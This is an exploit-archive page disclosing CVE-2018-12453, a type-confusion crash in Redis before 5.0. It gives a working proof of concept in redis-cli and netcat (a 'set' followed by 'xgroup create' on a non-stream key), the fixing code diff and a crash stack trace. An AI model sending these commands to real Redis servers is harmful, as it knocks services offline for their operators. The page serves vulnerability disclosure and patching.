what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Redis 5.0 Denial Of Service

Redis 5.0 Denial Of Service
Posted Jun 21, 2018
Authored by Fakhri Zulkifli

Redis version 5.0 suffers from a denial of service vulnerability.

tags | exploit, denial of service
advisories | CVE-2018-12453
SHA-256 | b9083d6a3754d8b70668b2647c1527f54eb1ff6f6c59aab67e247696efd33b11

Redis 5.0 Denial Of Service

Change Mirror Download
# Exploit Title: Redis 5.0 Denial of Service
# Date: 2018-06-13
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/download
# Version: 5.0
# Fixed on: 5.0
# CVE : CVE-2018-12453

Type confusion in the xgroupCommand function in t_stream.c in redis-server in Redis before 5.0 allows remote attackers to cause denial-of-service via an XGROUP command in which the key is not a stream.


PoC:
$ ./src/redis-cli -p 1234
127.0.0.1:1234> set a 123
OK
127.0.0.1:1234> xgroup create a b $
Error: Connection reset by peer <a segfault'ed
127.0.0.1:1234>

The bug also could be triggered via netcat
$ nc 127.0.0.1 1234
set a 123
+OK
xgroup create a b $ <a segfaultaed after this line


@@ -1576,7 +1576,7 @@ NULL
/* Lookup the key now, this is common for all the subcommands but HELP. */
if (c->argc >= 4) {
robj *o = lookupKeyWriteOrReply(c,c->argv[2],shared.nokeyerr);
- if (o == NULL) return;
+ if (o == NULL || checkType(c,o,OBJ_STREAM)) return;
s = o->ptr;
grpname = c->argv[3]->ptr;


#0 0x6d0706 in logStackContent /home/user/redis/src/debug.c:732:45
#1 0x6d3917 in sigsegvHandler /home/user/redis/src/debug.c:1089:5
#2 0x7f65d736e38f (/lib/x86_64-linux-gnu/libpthread.so.0+0x1138f)
#3 0x804afc in streamLookupCG /home/user/redis/src/t_stream.c:1502:12
#4 0x805b36 in xgroupCommand /home/user/redis/src/t_stream.c:1584:19
#5 0x58ded7 in call /home/user/redis/src/server.c:2298:5
#6 0x591c70 in processCommand /home/user/redis/src/server.c:2580:9
#7 0x5e2d98 in processInputBuffer /home/user/redis/src/networking.c:1325:17
#8 0x565612 in aeProcessEvents /home/user/redis/src/ae.c:443:17
#9 0x56614c in aeMain /home/user/redis/src/ae.c:501:9
#10 0x59da71 in main /home/user/redis/src/server.c:3992:5
#11 0x7f65d6d9d82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#12 0x43da38 in _start (/home/user/redis/src/redis-server+0x43da38)

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close